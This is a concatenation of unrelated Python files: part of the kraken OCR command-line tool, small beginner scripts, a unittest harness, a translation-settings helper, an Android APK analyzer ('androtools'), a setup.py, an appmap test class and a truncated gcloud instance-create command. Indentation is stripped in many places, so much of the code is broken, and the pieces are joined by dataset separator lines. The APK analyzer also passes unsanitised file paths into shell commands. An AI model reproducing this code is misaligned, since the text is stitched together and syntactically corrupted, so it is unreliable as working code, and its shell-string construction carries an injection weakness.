                       'text_direction': 'horizontal-lr',
                       'boxes': [(0, 0) + im.size]}, lines)
            lines.close()
            lines = lines.name
            is_temp_segmentation = True
else:
raise click.UsageError('No line segmentation given. Add one with `-l` or run `segment` first.')
elif no_segmentation:
logger.warning('no_segmentation mode enabled but segmentation defined. Ignoring --no-segmentation option.')
with open_file(lines, 'r') as fp:
try:
fp = cast(IO[Any], fp)
bounds = json.load(fp)
except ValueError as e:
raise click.UsageError('{} invalid segmentation: {}'.format(lines, str(e)))
# script detection
if bounds['script_detection']:
for l in bounds['boxes']:
for t in l:
scripts.add(t[0])
it = rpred.mm_rpred(model, im, bounds, pad,
bidi_reordering=bidi_reordering,
script_ignore=script_ignore)
else:
it = rpred.rpred(model['default'], im, bounds, pad,
bidi_reordering=bidi_reordering)
    if is_temp_segmentation:
        logger.debug('Removing temporary segmentation file.')
        os.unlink(lines)
preds = []
with log.progressbar(it, label='Processing', length=len(bounds['boxes'])) as bar:
for pred in bar:
preds.append(pred)
ctx = click.get_current_context()
with open_file(output, 'w', encoding='utf-8') as fp:
fp = cast(IO[Any], fp)
message('Writing recognition results for {}\t'.format(base_image), nl=False)
logger.info('Serializing as {} into {}'.format(ctx.meta['mode'], output))
if ctx.meta['mode'] != 'text':
from kraken import serialization
fp.write(serialization.serialize(preds, base_image,
Image.open(base_image).size,
ctx.meta['text_direction'],
scripts,
ctx.meta['mode']))
else:
fp.write('\n'.join(s.prediction for s in preds))
message('\u2713', fg='green')
@click.group(chain=True)
@click.version_option()
@click.option('-i', '--input', type=(click.Path(exists=True), # type: ignore
click.Path(writable=True)), multiple=True,
help='Input-output file pairs. Each input file (first argument) is mapped to one '
'output file (second argument), e.g. `-i input.png output.txt`')
@click.option('-I', '--batch-input', multiple=True, help='Glob expression to add multiple files at once.')
@click.option('-o', '--suffix', help='Suffix for output files from batch inputs.')
@click.option('-v', '--verbose', default=0, count=True, show_default=True)
@click.option('-d', '--device', default='cpu', show_default=True, help='Select device to use (cpu, cuda:0, cuda:1, ...)')
def cli(input, batch_input, suffix, verbose, device):
"""
Base command for recognition functionality.
Inputs are defined as one or more pairs `-i input_file output_file`
followed by one or more chainable processing commands. Likewise, verbosity
is set on all subcommands with the `-v` switch.
"""
ctx = click.get_current_context()
ctx.meta['device'] = device
log.set_logger(logger, level=30-min(10*verbose, 20))
@cli.resultcallback()
def process_pipeline(subcommands, input, batch_input, suffix, **args):
"""
Helper function calling the partials returned by each subcommand and
placing their respective outputs in temporary files.
"""
import glob
import tempfile
input = list(input)
if batch_input and suffix:
for batch_expr in batch_input:
for in_file in glob.glob(batch_expr, recursive=True):
input.append((in_file, '{}{}'.format(os.path.splitext(in_file)[0], suffix)))
    for io_pair in input:
        base_image = io_pair[0]
        fc = [io_pair[0]] + [tempfile.mkstemp()[1] for cmd in subcommands[1:]] + [io_pair[1]]
        try:
            for task, input, output in zip(subcommands, fc, fc[1:]):
                task(base_image=base_image, input=input, output=output)
                base_image = input
        finally:
            for f in fc[1:-1]:
                os.unlink(f)
@cli.command('binarize')
@click.option('--threshold', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--zoom', show_default=True, default=0.5, type=click.FLOAT)
@click.option('--escale', show_default=True, default=1.0, type=click.FLOAT)
@click.option('--border', show_default=True, default=0.1, type=click.FLOAT)
@click.option('--perc', show_default=True, default=80, type=click.IntRange(1, 100))
@click.option('--range', show_default=True, default=20, type=click.INT)
@click.option('--low', show_default=True, default=5, type=click.IntRange(1, 100))
@click.option('--high', show_default=True, default=90, type=click.IntRange(1, 100))
def binarize(threshold, zoom, escale, border, perc, range, low, high):
"""
Binarizes page images.
"""
return partial(binarizer, threshold, zoom, escale, border, perc, range, low, high)
@cli.command('segment')
@click.option('-d', '--text-direction', default='horizontal-lr',
show_default=True,
type=click.Choice(['horizontal-lr', 'horizontal-rl',
'vertical-lr', 'vertical-rl']),
help='Sets principal text direction')
@click.option('-s/-n', '--script-detect/--no-script-detect', default=False,
show_default=True,
help='Enable script detection on segmenter output')
@click.option('-a', '--allowed-scripts', default=None, multiple=True,
show_default=True,
help='List of allowed scripts in script detection output. Ignored if disabled.')
@click.option('--scale', show_default=True, default=None, type=click.FLOAT)
@click.option('-m', '--maxcolseps', show_default=True, default=2, type=click.INT)
@click.option('-b/-w', '--black-colseps/--white_colseps', show_default=True, default=False)
@click.option('-r/-l', '--remove_hlines/--hlines', show_default=True, default=True)
@click.option('-p', '--pad', show_default=True, type=(int, int), default=(0, 0),
help='Left and right padding around lines')
@click.option('--mask', show_default=True, default=None,
type=click.File(mode='rb', lazy=True), help='Segmentation mask '
'suppressing page areas for line detection. 0-valued image '
'regions are ignored for segmentation purposes. Disables column '
'detection.')
def segment(text_direction, script_detect, allowed_scripts, scale, maxcolseps,
black_colseps, remove_hlines, pad, mask):
"""
Segments page images into text lines.
"""
return partial(segmenter, text_direction, script_detect, allowed_scripts,
scale, maxcolseps, black_colseps, remove_hlines, pad, mask)
def _validate_mm(ctx, param, value):
model_dict = {'ignore': []} # type: Dict[str, Union[str, List[str]]]
if len(value) == 1 and len(value[0].split(':')) == 1:
model_dict['default'] = value[0]
return model_dict
try:
for m in value:
k, v = m.split(':')
if v == 'ignore':
model_dict['ignore'].append(k) # type: ignore
else:
model_dict[k] = os.path.expanduser(v)
except Exception as e:
raise click.BadParameter('Mappings must be in format script:model')
return model_dict
@cli.command('ocr')
@click.pass_context
@click.option('-m', '--model', default=DEFAULT_MODEL, multiple=True,
show_default=True, callback=_validate_mm,
              help='Path to a recognition model or mapping of the form '
'$script1:$model1. Add multiple mappings to run multi-model '
'recognition based on detected scripts. Use the default keyword '
'for adding a catch-all model. Recognition on scripts can be '
'ignored with the model value ignore.')
@click.option('-p', '--pad', show_default=True, type=click.INT, default=16, help='Left and right '
'padding around lines')
@click.option('-n', '--reorder/--no-reorder', show_default=True, default=True,
help='Reorder code points to logical order')
@click.option('-s', '--no-segmentation', default=False, show_default=True, is_flag=True,
help='Enables non-segmentation mode treating each input image as a whole line.')
@click.option('-h', '--hocr', 'serializer', help='Switch between hOCR, '
'ALTO, and plain text output', flag_value='hocr')
@click.option('-a', '--alto', 'serializer', flag_value='alto')
@click.option('-y', '--abbyy', 'serializer', flag_value='abbyyxml')
@click.option('-t', '--text', 'serializer', flag_value='text', default=True,
show_default=True)
@click.option('-d', '--text-direction', default='horizontal-tb',
show_default=True,
type=click.Choice(['horizontal-tb', 'vertical-lr', 'vertical-rl']),
help='Sets principal text direction in serialization output')
@click.option('-l', '--lines', type=click.Path(exists=True), show_default=True,
help='JSON file containing line coordinates')
@click.option('--threads', default=1, show_default=True,
help='Number of threads to use for OpenMP parallelization.')
def ocr(ctx, model, pad, reorder, no_segmentation, serializer, text_direction, lines, threads):
"""
Recognizes text in line images.
"""
from kraken.lib import models
    # first we try to find the model in the absolute path, then ~/.kraken, then
    # LEGACY_MODEL_DIR
nm = {} # type: Dict[str, models.TorchSeqRecognizer]
ign_scripts = model.pop('ignore')
for k, v in model.items():
search = [v,
os.path.join(click.get_app_dir(APP_NAME), v),
os.path.join(LEGACY_MODEL_DIR, v)]
location = None
for loc in search:
if os.path.isfile(loc):
location = loc
break
if not location:
raise click.BadParameter('No model for {} found'.format(k))
message('Loading RNN {}\t'.format(k), nl=False)
try:
rnn = models.load_any(location, device=ctx.meta['device'])
nm[k] = rnn
        except Exception:
            message('\u2717', fg='red')
            ctx.exit(1)
message('\u2713', fg='green')
if 'default' in nm:
from collections import defaultdict
nn = defaultdict(lambda: nm['default']) # type: Dict[str, models.TorchSeqRecognizer]
nn.update(nm)
nm = nn
    # thread count is global so setting it once is sufficient
    nm[k].nn.set_num_threads(threads)
# set output mode
ctx.meta['mode'] = serializer
ctx.meta['text_direction'] = text_direction
return partial(recognizer,
model=nm,
pad=pad,
no_segmentation=no_segmentation,
bidi_reordering=reorder,
script_ignore=ign_scripts,
lines=lines)
@cli.command('show')
@click.pass_context
@click.argument('model_id')
def show(ctx, model_id):
"""
Retrieves model metadata from the repository.
"""
import unicodedata
from kraken import repo
from kraken.lib.util import make_printable, is_printable
desc = repo.get_description(model_id)
chars = []
combining = []
for char in sorted(desc['graphemes']):
if not is_printable(char):
combining.append(make_printable(char))
else:
chars.append(char)
message('name: {}\n\n{}\n\n{}\nscripts: {}\nalphabet: {} {}\naccuracy: {:.2f}%\nlicense: {}\nauthor(s): {}\ndate: {}'.format(model_id,
desc['summary'],
desc['description'],
' '.join(desc['script']),
''.join(chars),
', '.join(combining),
desc['accuracy'],
desc['license']['id'],
'; '.join(x['name'] for x in desc['creators']),
desc['publication_date']))
ctx.exit(0)
@cli.command('list')
@click.pass_context
def list_models(ctx):
"""
Lists models in the repository.
"""
from kraken import repo
message('Retrieving model list ', nl=False)
model_list = repo.get_listing(partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h\n', nl=False)
for id, metadata in model_list.items():
message('{} ({}) - {}'.format(id, ', '.join(metadata['type']), metadata['summary']))
ctx.exit(0)
@cli.command('get')
@click.pass_context
@click.argument('model_id')
def get(ctx, model_id):
"""
Retrieves a model from the repository.
"""
from kraken import repo
try:
os.makedirs(click.get_app_dir(APP_NAME))
except OSError:
pass
message('Retrieving model ', nl=False)
filename = repo.get_model(model_id, click.get_app_dir(APP_NAME),
partial(message, '.', nl=False))
message('\b\u2713', fg='green', nl=False)
message('\033[?25h')
message('Model name: {}'.format(filename))
ctx.exit(0)
if __name__ == '__main__':
cli()
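# Example invocations of the chained CLI above (file paths and the model name
# are illustrative):
#   kraken -i page.png page.txt binarize segment ocr -m en-default.mlmodel
#   kraken -I 'scans/*.png' -o .txt binarize segment ocr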
|
nilq/baby-python
|
python
|
hello = 'hello world'
print(hello)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
nota1 = float(input('Enter the first grade: '))
nota2 = float(input('Enter the second grade: '))
media = (nota1 + nota2) / 2
print('The average was {:.2f}!'.format(media))
|
nilq/baby-python
|
python
|
import unittest
import sys
undertest = __import__(sys.argv[-1].split(".py")[0])
maioridade_penal = getattr(undertest, 'maioridade_penal', None)
class PublicTests(unittest.TestCase):
def test_basico_1(self):
assert maioridade_penal("Jansen Italo Ana","14 21 60") == "Italo Ana"
if __name__ == '__main__':
loader = unittest.TestLoader()
runner = unittest.TextTestRunner()
runner.run(loader.loadTestsFromModule(sys.modules[__name__]))
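# Expected invocation: the module under test is passed as the last argv entry,
# e.g. (the file name is illustrative):
#   python test_public.py maioridade_penal.py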
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
import json
def stringToInt(origin_string):
result = 0
temp_string = origin_string.strip()
for c in temp_string:
if c >= '0' and c <= '9':
result = result * 10 + (ord(c) - ord('0'))
else:
return -1
return result
def getString(hint, default_value_hint, default_value):
temp_input = input("%s(%s): " % (hint, default_value_hint))
if temp_input != "":
return temp_input
else:
return default_value
def getNumber(hint, default_value_hint, default_value):
temp_input = input("%s(%s): " % (hint, default_value_hint))
if temp_input == "" or stringToInt(temp_input) < 0:
return default_value
else:
return stringToInt(temp_input)
def createNewSetting(a):
new_setting = dict(a["settings"][0])
new_setting["translator"]["url"] = getString(
"What server url would you like to use?",
new_setting["translator"]["url"],
new_setting["translator"]["url"]
)
new_setting["translator"]["delay_milliseconds"] = getNumber(
"Wait time between requests. It aims to limit the request rate for the access to translation server via this api may be canceled if the rate is too high.",
"700",
700
)
new_setting["IO"]["input_file"]["path"] = getString(
"Read from which file?",
"DESIDE AT RUNTIME",
None
)
new_setting["IO"]["input_file"]["encode"] = getString(
"Encodeing of input file?",
"utf-8",
"utf-8"
)
new_setting["IO"]["input_file"]["language"] = getString(
"Language of input file.",
"auto",
"auto"
)
new_setting["IO"]["output_file"]["path"] = getString(
"Write to which file?",
"ADD .out AFTER INPUT PATH",
None
)
new_setting["IO"]["output_file"]["encode"] = getString(
"Encodeing of output file?",
"utf-8",
"utf-8"
)
temp = input("Now please tell me the route of translation language, one each line. End with a empty line?(ja zh-cn):\n")
temp_list = list()
while True:
if temp == "":
break
temp_list.append(temp)
temp = input()
if len(temp_list) >= 2:
new_setting["translation"]["steps"] = temp_list
new_setting["translation"]["rounds"] = getNumber(
"Translate for how many rounds. Set to 0 to translate until the result no longer changes.",
"0",
0
)
new_setting["name"] = input("Finally, give this setting a name: ")
a["settings"].append(new_setting)
temp = input("Set this setting default?[Y]/n: ")
if temp == "" or temp == "y" or temp == "Y":
a["default"] = len(a["settings"]) - 1
    try:
        with open("settings.json", "w") as file:
            file.write(json.dumps(a, indent="\t"))
    except IOError:
        print("Oops, can't save setting! Terminate......")
        exit()
def getSetting():
    try:
        with open("settings.json", "r") as file:
            a = json.loads(file.read())
    except IOError:
        print("Can't read setting file. Terminate.")
        exit()
current_index = 0
for setting in a["settings"]:
print("%d. %s%s" % (current_index, setting["name"], "(DEFAULT)" if(current_index == a["default"]) else ""))
current_index += 1
print("%d. CREATE A NEW SETTING" % current_index)
selection = input("Please select a setting by its index, or <ENTER> for default: ")
if selection == "":
selected_setting = a["default"]
else:
selected_setting = stringToInt(selection)
if selected_setting > current_index or selected_setting < 0:
print("Invalid index. Use default.")
selected_setting = a["default"]
elif selected_setting == current_index:
createNewSetting(a)
return a["settings"][selected_setting]
|
nilq/baby-python
|
python
|
import sys
import zipfile
import shutil
import commands
import os
import hashlib
import re
import traceback
import json
from lib.dexparser import Dexparser
from lib.CreateReport import HTMLReport
from lib.Certification import CERTParser
import lib.dynamic as dynamic
dexList = [] #dexfile list
#program usage
def usage():
print "androtools : no file specified"
print "./androtools <APK_FILE_PATH> <HTML_OUTPUT_FILENAME>"
#program information
def about(apkfile):
print "Androtools - Android APK Static & Dynamic Analyzer"
print "Developed by Kim Namjun (Sejong University, Department of Information Security)"
print "Target APK Path : %s" %apkfile
#filehash extractor
def filehash(apkfile, mode):
    hashers = {'md5': hashlib.md5, 'sha1': hashlib.sha1, 'sha256': hashlib.sha256}
    if mode not in hashers:
        return ""
    m = hashers[mode]()
    with open(apkfile, 'rb') as f:
        while True:
            data = f.read(8192)
            if not data:
                break
            m.update(data)
    return m.hexdigest()
#delete temp file directory
def delTemp():
commands.getoutput("rm -rf temp")
#check that the target file is a valid apk file
def is_android(zfile):
for fname in zfile.namelist():
if "AndroidManifest.xml" in fname:
return True
elif "resources.arsc" in fname:
return True
else:
pass
return False
#logging error to error_log.txt
def logError(error_msg):
f = open('error_log.txt', 'a+')
f.write('[*] ' + error_msg + '\n')
f.close()
#extract dex file to temp file
def extractDEX(zfile):
global dexList
for fname in zfile.namelist():
if fname[-4:] == ".dex": #if file extension is dex
zfile.extract(fname, "temp")
dexpath = os.path.join("temp", fname)
dexhash = filehash(dexpath, "md5")
shutil.move(dexpath, os.path.join("temp", dexhash + ".dex"))
dexList.append(dexhash + ".dex")
#file resource searching
def fileResource(zfile):
print "[*] Extracting File Resource Data..."
extension = {'.apk' : 0, '.png' : 0, '.jpg' : 0, '.xml' : 0, '.mp3' : 0, '.txt' : 0, '.ini' : 0, '.so' : 0}
keylist = extension.keys()
soEnvironment = []
for fname in zfile.namelist():
if fname[-4:] in keylist:
extension[fname[-4:]] += 1
if fname[:4] == "lib/":
soEnvironment.append(fname.split('/')[1])
extension[fname[-3:]] += 1
statistics = []
for ext in extension.keys():
if extension[ext] == 0:
pass
else:
tempArr = []
tempArr.append(ext)
tempArr.append(str(extension[ext]))
statistics.append(tempArr)
return statistics
#extract string from xml
def extractString(report, apkfile):
print "[*] Extracting All XML String..."
stringCmd = "./lib/aapt dump strings %s" %apkfile
strResult = commands.getoutput(stringCmd).split('\n')
extractedStr = []
for xmlstring in strResult:
if "res/" in xmlstring:
pass
else:
try:
if len(xmlstring.split(':')[1]) == 0:
pass
else:
extractedStr.append(xmlstring.split(': ')[1])
except:
extractedStr.append(xmlstring)
report.stringinfo(extractedStr)
#get method information from dex
def methodAnalysis(report, string, typeid, method):
methodArr = []
for i in range(len(method)):
(class_idx, proto_idx, name_idx) = method[i]
class_str = string[typeid[class_idx]]
name_str = string[name_idx]
data = '%s.%s()' % (class_str, name_str)
methodArr.append(data)
report.dexmethodinfo(methodArr)
#get dex class filename (.java)
def classExtract(report, string):
classArray = []
for dexstr in string:
if ".java" in dexstr:
classArray.append(dexstr)
report.dexclassinfo(classArray)
#get dex adler32 checksum
def checksum(dexmodule):
return dexmodule.checksum()
#check similarity using ssdeep
def simcheck(apkfile, fuzzyhash):
print "[*] Checking Similarity..."
simdata = []
match = []
    if not os.path.exists('sim.txt'): #if sim.txt not found?
        print "[*] Creating similarity storage DB.."
        with open('sim.txt', 'a+') as f:
            f.write('ssdeep,1.1--blocksize:hash:hash,filename\n' + fuzzyhash + '\n')
else:
searchQuery = commands.getoutput("ssdeep -m sim.txt " + apkfile).split('\n')
#print searchQuery
for query in searchQuery:
tempArr = []
try:
persent = query.split(':')[1].split(' ')[1].replace(')', '%)')
filename = os.path.basename(query.split(':')[1].split(' ')[0])
tempArr.append(filename)
tempArr.append(persent)
match.append(tempArr)
except:
pass
        with open('sim.txt', 'a+') as f:
            f.write(fuzzyhash + '\n')
return match
#find suspicious string in dex and replace if highlight
def findSuspicious(report, stringlist):
dexstrlist = []
for i in range(len(stringlist)):
email = re.findall(r'([\w.-]+)@([\w.-]+)', stringlist[i])
url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', stringlist[i])
ip = re.findall(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', stringlist[i])
if email:
dexstrlist.append(str(email[0][0] + "@" + email[0][1]))
if url:
dexstrlist.append(str(url[0]))
if ip:
dexstrlist.append(str(ip[0]))
report.dexstringinfo(dexstrlist)
#parse information from DEX list
def parseDEX(report):
global dexList
report.dexinfoHeader()
for dexfile in dexList:
parse = Dexparser(os.path.join("temp", dexfile))
string = parse.string_list()
typeid = parse.typeid_list()
method = parse.method_list()
adler32 = checksum(parse)
report.dexBasicinfo(dexfile, adler32)
findSuspicious(report, string)
#classExtract(report, string)
#methodAnalysis(report, string, typeid, method)
#get permission information
def permission(report, apkfile):
print "[*] Extracting Permission Data..."
permlist = []
permcmd = "./lib/aapt dump permissions %s" %apkfile
getperm = commands.getoutput(permcmd).split('\n')
for perm in getperm:
if "uses-permission" in perm:
permlist.append(perm.split(': ')[1])
report.writePerminfo(permlist)
def nativeparser(solist, report):
filterList = []
for sofile in solist:
with open(os.path.join("temp", sofile[1] + ".so"), 'rb') as f:
data = f.read()
email = re.findall(r'([\w.-]+)@([\w.-]+)', data)
url = re.findall(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', data)
ip = re.findall(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', data)
if email:
if str(email[0][0] + "@" + email[0][1]) not in filterList:
filterList.append(str(email[0][0] + "@" + email[0][1]))
if url:
if str(url[0]) not in filterList:
filterList.append(str(url[0]))
if ip:
if str(ip[0]) not in filterList:
filterList.append(str(ip[0]))
report.nativeStringinfo(filterList)
#native file information
def nativefile(zfile, report):
print "[*] Extracting Native File Data..."
solist = []
for fname in zfile.namelist():
if fname[-3:] == ".so":
tempArr = []
sofile = os.path.basename(fname)
source = zfile.open(fname)
target = file(os.path.join("temp", sofile), "wb")
with source, target:
shutil.copyfileobj(source, target)
sohash = filehash(os.path.join("temp", sofile), "sha1")
shutil.move(os.path.join("temp", sofile), os.path.join("temp", sohash + ".so"))
tempArr.append(fname)
tempArr.append(sohash)
solist.append(tempArr)
report.nativeFileinfo(solist)
nativeparser(solist, report)
#get apk file basic information
def getbasic(apkfile, report):
print "[*] Extracting Basic APK File Data..."
filename = os.path.basename(apkfile)
md5hash = filehash(apkfile, "md5")
sha1hash = filehash(apkfile, "sha1")
sha256hash = filehash(apkfile, "sha256")
filesize = str(os.path.getsize(apkfile) / 1024)
try:
fuzzy = commands.getoutput("ssdeep -s " + apkfile).split('\n')[1]
except:
print "[*] Fuzzyhash Command not found. Please <brew install ssdeep> to install"
fuzzy = ""
report.writeBaseinfo(filename, md5hash, sha1hash, sha256hash, fuzzy.split(',')[0], filesize)
return fuzzy
#get Certification information
def getCert(zfile, report):
print "[*] Extracting Certification Data..."
certlist = []
certdata = []
for fname in zfile.namelist():
if fname[-4:] == ".RSA":
certfile = os.path.basename(fname)
source = zfile.open(fname)
target = file(os.path.join("temp", certfile), "wb")
with source, target:
shutil.copyfileobj(source, target)
certlist.append(certfile)
for cert in certlist:
tempArr = []
c = CERTParser(os.path.join("temp", cert))
tempArr.append(cert)
tempArr.append(c.fingerprint())
tempArr.append(c.issuer())
tempArr.append(c.starttime())
certdata.append(tempArr)
report.writeCERTinfo(certdata)
#get AndroidManifest.xml information
def getManifest(apkfile, report):
print "[*] Extracting AndroidManifest Data..."
infocmd = "./lib/aapt dump badging %s" %apkfile
getinfo = commands.getoutput(infocmd).split('\n')
apiver = ""
cputype = ""
entry = ""
targetver = ""
appname = ""
packname = ""
entry = ""
for info in getinfo:
data = info.split(':')
if data[0] == "sdkVersion":
apiver = data[1].replace('\'', '')
if data[0] == "targetSdkVersion":
targetver = data[1].replace('\'', '')
if data[0] == "application-label":
try:
appname = data[1].replace('\'', '')
except:
appname = data[1]
if data[0] == "package":
packname = data[1].split('\'')[1]
if data[0] == "launchable-activity":
entry = data[1].split('\'')[1]
if data[0] == "native-code":
for cpu in data[1].split('\''):
cputype += cpu + " "
report.writeManifestinfo(apiver, cputype, targetver, appname, packname, entry)
return [packname, entry]
#dynamic analysis
def dynamicAnalysis(report, apkfile, packname, entry):
print "[*] Dynamic Analysis start!"
anal_result = dynamic.main(apkfile, packname, entry)
result = json.loads(anal_result)
try:
report.datasectioninfo(result['filetag']['startCreate'], result['filetag']['endCreate'])
except:
pass
try:
report.logcatinfo(result['logtag'])
except:
pass
try:
report.packetinfo(result['packettag']['packet'], result['timeline']['ipList'])
except:
pass
print "[*] Dynamic Analysis end!"
#program entry point
def main(apkfile, output):
try:
about(apkfile) #program information
        isValid = zipfile.is_zipfile(apkfile) #check valid zip container
        if isValid:
zfile = zipfile.ZipFile(apkfile)
isAndroid = is_android(zfile) #check vaild android apk file
if isAndroid:
print "[*] Analysis start!"
#setting HTML Report
report = HTMLReport(output)
report.header()
report.style()
report.bodystart()
fuzzy = getbasic(apkfile, report)
extractDEX(zfile) #extract dex file
filetype = fileResource(zfile) #analyze file resources
simresult = simcheck(apkfile, fuzzy) #similarity check
report.writeFileinfo(filetype, simresult)
xmlinfo = getManifest(apkfile, report)
permission(report, apkfile)
getCert(zfile, report)
parseDEX(report)
extractString(report, apkfile)
nativefile(zfile, report)
dynamicAnalysis(report, apkfile, xmlinfo[0], xmlinfo[1])
report.endbody()
del report
else:
print "[*] Sorry, We can\'t analyze this file"
else:
print "[*] Sorry, We can\'t analyze this file"
delTemp()
print "[*] Analysis complete!"
except Exception, e:
logError(str(traceback.format_exc()))
print "[*] Androtools Exception - Error logged!"
if __name__ == '__main__':
try:
main(sys.argv[1], sys.argv[2])
except:
usage()
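# Usage sketch, inferred from main(sys.argv[1], sys.argv[2]) above (the
# script filename is an assumption):
#   python androtools.py sample.apk report.html
# where the first argument is the APK to analyze and the second is the
# output path for the HTML report.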
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import setuptools
setuptools.setup(
author='Bryan Stitt',
author_email='bryan@stitthappens.com',
description='Mark shows unwatched on a schedule.',
long_description=__doc__,
entry_points={
'console_scripts': [
'plex-schedule = plex_schedule.cli:cli',
],
},
install_requires=[
'click',
'plexapi',
'sqlalchemy',
'PyYAML',
], # keep this in sync with requirements.in
name='plex_schedule',
packages=setuptools.find_packages(),
version='0.0.1.dev0',
)
|
nilq/baby-python
|
python
|
"""A class using all the slightly different ways a function could be defined
and called. Used for testing appmap instrumentation.
"""
# pylint: disable=missing-function-docstring
from functools import lru_cache, wraps
import time
import appmap
class ClassMethodMixin:
@classmethod
def class_method(cls):
return 'ClassMethodMixin#class_method, cls %s' % (cls.__name__)
class Super:
def instance_method(self):
return self.method_not_called_directly()
def method_not_called_directly(self):
return 'Super#instance_method'
def wrap_fn(fn):
@wraps(fn)
def wrapped_fn(*args, **kwargs):
try:
print('calling %s' % (fn.__name__))
return fn(*args, **kwargs)
finally:
print('called %s' % (fn.__name__))
return wrapped_fn
class ExampleClass(Super, ClassMethodMixin):
def __repr__(self):
return 'ExampleClass and %s' % (self.another_method())
# Include some lines so the line numbers in the expected appmap
# don't change:
# <blank>
def another_method(self):
return "ExampleClass#another_method"
def test_exception(self):
raise Exception('test exception')
what_time_is_it = time.gmtime
@appmap.labels('super', 'important')
def labeled_method(self):
return 'super important'
@staticmethod
@wrap_fn
def wrapped_static_method():
return 'wrapped_static_method'
@classmethod
@wrap_fn
def wrapped_class_method(cls):
return 'wrapped_class_method'
@wrap_fn
def wrapped_instance_method(self):
return 'wrapped_instance_method'
@staticmethod
@lru_cache(maxsize=1)
def static_cached(value):
return value + 1
def instance_with_param(self, p):
return p
@staticmethod
def static_method():
import yaml, io # Formatting is funky to minimize changes to expected appmap
yaml.Dumper(io.StringIO()).open(); return 'ExampleClass.static_method\n...\n'
@staticmethod
def call_yaml():
return ExampleClass.dump_yaml('ExampleClass.call_yaml')
@staticmethod
def dump_yaml(data):
import yaml
# Call twice, to make sure both show up in the recording
yaml.dump(data)
yaml.dump(data)
def with_docstring(self):
"""
docstrings can have
multiple lines
"""
return True
# comments can have
# multiple lines
def with_comment(self):
return True
|
nilq/baby-python
|
python
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for creating instances."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import csek_utils
from googlecloudsdk.api_lib.compute import image_utils
from googlecloudsdk.api_lib.compute import instance_utils
from googlecloudsdk.api_lib.compute import metadata_utils
from googlecloudsdk.api_lib.compute import utils
from googlecloudsdk.api_lib.compute import zone_utils
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags
from googlecloudsdk.command_lib.compute.instances import flags as instances_flags
DETAILED_HELP = {
'DESCRIPTION': """\
*{command}* facilitates the creation of Google Compute Engine
virtual machines. For example, running:
$ {command} example-instance-1 example-instance-2 example-instance-3 --zone us-central1-a
will create three instances called `example-instance-1`,
`example-instance-2`, and `example-instance-3` in the
`us-central1-a` zone.
When an instance is in RUNNING state and the system begins to boot,
the instance creation is considered finished, and the command returns
with a list of new virtual machines. Note that you usually cannot log
into a new instance until it finishes booting. Check the progress of an
instance using `gcloud compute instances get-serial-port-output`.
For more examples, refer to the *EXAMPLES* section below.
""",
'EXAMPLES': """\
To create an instance with the latest ``Red Hat Enterprise Linux
6'' image available, run:
$ {command} example-instance --image rhel-6 --zone us-central1-a
""",
}
def _CommonArgs(parser):
"""Register parser args common to all tracks."""
metadata_utils.AddMetadataArgs(parser)
instances_flags.AddDiskArgs(parser)
instances_flags.AddLocalSsdArgs(parser)
instances_flags.AddCanIpForwardArgs(parser)
instances_flags.AddAddressArgs(parser, instances=True)
instances_flags.AddMachineTypeArgs(parser)
instances_flags.AddMaintenancePolicyArgs(parser)
instances_flags.AddNoRestartOnFailureArgs(parser)
instances_flags.AddPreemptibleVmArgs(parser)
instances_flags.AddScopeArgs(parser)
instances_flags.AddTagsArgs(parser)
instances_flags.AddCustomMachineTypeArgs(parser)
instances_flags.AddNetworkArgs(parser)
instances_flags.AddPrivateNetworkIpArgs(parser)
instances_flags.AddImageArgs(parser)
parser.add_argument(
'--description',
help='Specifies a textual description of the instances.')
parser.add_argument(
'names',
metavar='NAME',
nargs='+',
help='The names of the instances to create.')
flags.AddZoneFlag(
parser,
resource_type='instances',
operation_type='create')
csek_utils.AddCsekKeyArgs(parser)
class Create(base_classes.BaseAsyncCreator,
image_utils.ImageExpander,
zone_utils.ZoneResourceFetcher):
"""Create Google Compute Engine virtual machine instances."""
@staticmethod
def Args(parser):
_CommonArgs(parser)
@property
def service(self):
return self.compute.instances
@property
def method(self):
return 'Insert'
@property
def resource_type(self):
return 'instances'
def CreateRequests(self, args):
instances_flags.ValidateDiskFlags(args)
instances_flags.ValidateLocalSsdFlags(args)
# This feature is only exposed in alpha/beta
allow_rsa_encrypted = self.ReleaseTrack() in [base.ReleaseTrack.ALPHA,
base.ReleaseTrack.BETA]
self.csek_keys = csek_utils.CsekKeyStore.FromArgs(args, allow_rsa_encrypted)
scheduling = instance_utils.CreateSchedulingMessage(
messages=self.messages,
maintenance_policy=args.maintenance_policy,
preemptible=args.preemptible,
restart_on_failure=args.restart_on_failure)
service_accounts = instance_utils.CreateServiceAccountMessages(
messages=self.messages,
scopes=([] if args.no_scopes else args.scopes))
if args.tags:
tags = self.messages.Tags(items=args.tags)
else:
tags = None
metadata = metadata_utils.ConstructMetadataMessage(
self.messages,
metadata=args.metadata,
metadata_from_file=args.metadata_from_file)
# If the user already provided an initial Windows password and
# username through metadata, then there is no need to check
# whether the image or the boot disk is Windows.
boot_disk_size_gb = utils.BytesToGb(args.boot_disk_size)
utils.WarnIfDiskSizeIsTooSmall(boot_disk_size_gb, args.boot_disk_type)
instance_refs = self.CreateZonalReferences(args.names, args.zone)
# Check if the zone is deprecated or has maintenance coming.
self.WarnForZonalCreation(instance_refs)
network_interface = instance_utils.CreateNetworkInterfaceMessage(
